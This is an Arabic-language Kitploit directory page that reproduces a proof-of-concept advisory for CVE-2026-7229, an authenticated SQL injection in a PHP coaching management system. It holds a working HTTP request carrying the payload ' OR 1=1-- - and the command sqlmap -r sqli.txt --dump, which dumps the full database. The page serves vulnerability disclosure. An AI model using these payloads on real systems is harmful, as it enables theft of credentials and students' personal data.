Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/xmyronn/cve-2026-7229-sqli
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubxmyronn/cve-2026-7229-sqli

CVE-2026-7229-SQLI

إثبات مفهوم لثغرة حقن SQL مصادق عليها في نظام إدارة التدريب، يوضح تفريغ قاعدة البيانات عبر معامل complaintreply غير المعقّم.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة حقن SQL مُصادق عليها في نظام إدارة التدريب تسمح بتفريغ قاعدة البيانات

الوصف

توجد ثغرة حقن SQL في نظام إدارة التدريب المكتوب بلغة PHP. معامل complaintreply في وظيفة رد المسؤول لا يتم تنظيفه بشكل صحيح قبل استخدامه في استعلامات SQL. يمكن لمهاجم مُصادق (مسؤول) حقن استعلامات SQL خبيثة، مما يؤدي إلى استخراج قاعدة البيانات بالكامل.


تفاصيل الثغرة

  • النوع: حقن SQL (CWE-89: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL)
  • التأثير: تفريغ قاعدة البيانات / كشف بيانات الاعتماد
  • الملف المتأثر: /cims/modules/admin/reply.php
  • المعامل المتأثر: complaintreply
  • ناقل الهجوم: عن بُعد، مُصادق عليه (مسؤول)
  • قاعدة البيانات: MySQL (MariaDB)

البائع

code-projects.org


المنتج

نظام إدارة التدريب في PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/


الإصدار

غير معروف (تم اختباره على أحدث إصدار متاح اعتبارًا من أبريل 2026)


إثبات المفهوم (ملخص)

  1. يقدم الطالب شكوى Screenshot 2026-04-10 225755

  2. يفتح المسؤول الشكوى ويصل إلى ميزة الرد

POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded

complaintreply=' OR 1=1-- -&submit=submit

Screenshot 2026-04-10 225808
  1. اعتراض الطلب عبر Burp Suite Screenshot 2026-04-10 225821

  2. حقن الحمولة:

    root@kitploit:~
    '
    
Screenshot 2026-04-10 225844
root@kitploit:~
تم ملاحظة خطأ SQL

7. تأكيد الحقن:

root@kitploit:~
' OR 1=1-- -
Screenshot 2026-04-10 225900
  1. تفريغ قاعدة البيانات باستخدام:

    root@kitploit:~
    sqlmap -r sqli.txt --dump
    
Screenshot 2026-04-10 235219

تم تأكيد الحقن عبر الاستناد إلى الأخطاء، والاستناد إلى القيم المنطقية، والاستغلال الآلي باستخدام sqlmap

التأثير

  • إمكانية استخراج قاعدة البيانات بالكامل
  • كشف بيانات الاعتماد المخزنة كنص عادي
  • اختراق كامل لبيانات التطبيق
  • تجاوز المصادقة وتصعيد الامتيازات عبر استخراج بيانات الاعتماد
  • تم تحقيق تفريغ كامل لقاعدة البيانات بما في ذلك جدول المستخدمين (بيانات الاعتماد)، وبيانات التعريف الشخصية للطلاب، وسجلات المعلمين، وسجل الشكاوى.

الخطورة: حرجة

تنزيل الأداة